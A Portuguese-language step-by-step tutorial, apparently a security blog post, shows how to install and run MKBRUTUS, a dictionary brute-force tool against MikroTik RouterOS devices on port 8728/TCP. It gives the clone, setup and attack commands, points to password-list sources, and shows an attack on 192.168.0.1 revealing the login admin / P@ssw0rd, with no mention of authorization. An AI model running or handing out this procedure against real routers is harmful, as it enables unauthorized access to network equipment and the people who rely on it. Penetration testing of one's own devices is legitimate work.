InformationSecurityPro
Marcos Henrique
MKBRUTUS – Brute Force para MikroTik e dispositivos com RouterOS
O MKBRUTUS é uma ferramenta desenvolvida em python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.
Projeto: github.com/mkbrutusproject/mkbrutus
01 - Passo
Verifique a versão atual do python em seguida realiza a instalação da versão 3.
Linuxpython –version apt-get install python3
02 - Passo
Execute o comando de verificação da versão do Python novamente e observe que a versão não mudou mas a instalação da versão 3 foi realizada com sucesso.
Linuxpython –-version
03 - Passo
Realize o download do projeto MKBRUTUS.
Linuxgit clone https://github.com/mkbrutusproject/mkbrutus
04 - Passo
Altere as permissões do diretório MKBRUTUS e liste o conteúdo do diretório.
Linuxchmod -R 755 mkbrutus/ cd mkbrutus/ ls -l
05 - Passo
Execute a ferramenta seguindo do parâmetro -h para visualizar as opções de ajuda.
Linuxpython3 mkbrutus.py -h
06 - Passo
Crie um arquivo de senhas ou realize o download de uma lista nos sites:
Lista : wiki.skullsecurity.org/Passwords
Lista : wordlist.sourceforge.net
Linuxvim senhas.txt
07 - Passo
Realize o ataque no equipamento utilizando os seguintes parâmetros.
mkbrutus.py : Ferramenta de Brute Force
192.168.0.1 : IP do Roteador MikroTik
senhas.txt : Arquivo de Senhas(Wordlist)
O ataque é realizado com sucesso e o usuário e a senha são revelados:
- Usuário: admin
- Senha: P@ssw0rd
python3 mkbrutus.py -t 192.168.0.1 -d senhas.txt
São Paulo/SP
